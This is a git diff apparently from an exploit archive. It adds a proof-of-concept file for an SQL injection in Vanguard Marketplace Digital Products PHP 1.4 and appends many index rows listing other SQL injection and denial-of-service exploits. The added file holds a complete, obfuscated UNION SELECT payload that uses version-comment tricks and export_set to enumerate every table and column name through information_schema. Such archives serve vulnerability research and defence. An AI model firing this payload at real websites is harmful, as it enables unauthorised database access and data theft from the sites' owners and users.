b/exploits/php/webapps/43316.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - SQL Injection +# Dork: N/A +# Date: 11.12.2017 +# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio +# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825 +# Version: 1.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/p/[SQL] +# +# '++/*!50000UNION*/+/*!50000SELECT*/+1%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31%2c32%2c33--+- +# +# +# # # # # \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 216730a57..e02a43d42 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5763,10 +5763,17 @@ id,file,description,date,author,type,platform,port 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux, 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux, +43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware, 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows, 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows, 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple, 43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux, +43317,exploits/hardware/dos/43317.c,"MikroTik 6.40.5 ICMP - Denial of Service",2017-12-11,FarazPajohan,dos,hardware, +43320,exploits/multiple/dos/43320.txt,"iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules",2017-12-11,"Google Security Research",dos,multiple, +43321,exploits/macos/dos/43321.c,"macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures",2017-12-11,"Google Security Research",dos,macos, +43319,exploits/macos/dos/43319.c,"macOS - 'getrusage' Stack Leak Through struct Padding",2017-12-11,"Google Security Research",dos,macos, +43318,exploits/macos/dos/43318.c,"macOS - 'necp_get_socket_attributes' so_pcb Type Confusion",2017-12-11,"Google Security Research",dos,macos, +43322,exploits/linux/dos/43322.txt,"LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow",2017-12-11,"Jungun Baek",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -38313,8 +38320,36 @@ id,file,description,date,author,type,platform,port 43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, 43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43278,exploits/php/webapps/43278.txt,"Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, 43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, 43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43287,exploits/php/webapps/43287.txt,"Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43288,exploits/php/webapps/43288.txt,"Laundry Booking Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43289,exploits/php/webapps/43289.txt,"Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43290,exploits/php/webapps/43290.txt,"Multivendor Penny Auction Clone Script 1.0 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43292,exploits/php/webapps/43292.html,"Opensource Classified Ads Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43293,exploits/php/webapps/43293.txt,"PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43294,exploits/php/webapps/43294.txt,"Professional Service Script 1.0 - 'service-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43295,exploits/php/webapps/43295.txt,"Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43296,exploits/php/webapps/43296.txt,"Readymade Video Sharing Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43299,exploits/php/webapps/43299.txt,"Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43301,exploits/php/webapps/43301.txt,"Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43302,exploits/php/webapps/43302.txt,"Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43304,exploits/php/webapps/43304.txt,"Advanced Real Estate Script 4.0.7 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43305,exploits/php/webapps/43305.txt,"Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43306,exploits/php/webapps/43306.txt,"MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43307,exploits/php/webapps/43307.txt,"MLM Forced Matrix 2.0.9 - 'newid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43309,exploits/php/webapps/43309.txt,"Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43310,exploits/php/webapps/43310.txt,"Muslim Matrimonial Script 3.02 - 'succid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43311,exploits/php/webapps/43311.txt,"Advanced World Database 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43312,exploits/php/webapps/43312.txt,"Resume Clone Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43314,exploits/php/webapps/43314.html,"Basic Job Site Script 2.0.5 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php, +43315,exploits/php/webapps/43315.txt,"Vanguard 1.4 - Arbitrary File Upload",2017-12-11,"Ihsan Sencan",webapps,php, +43316,exploits/php/webapps/43316.txt,"Vanguard 1.4 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,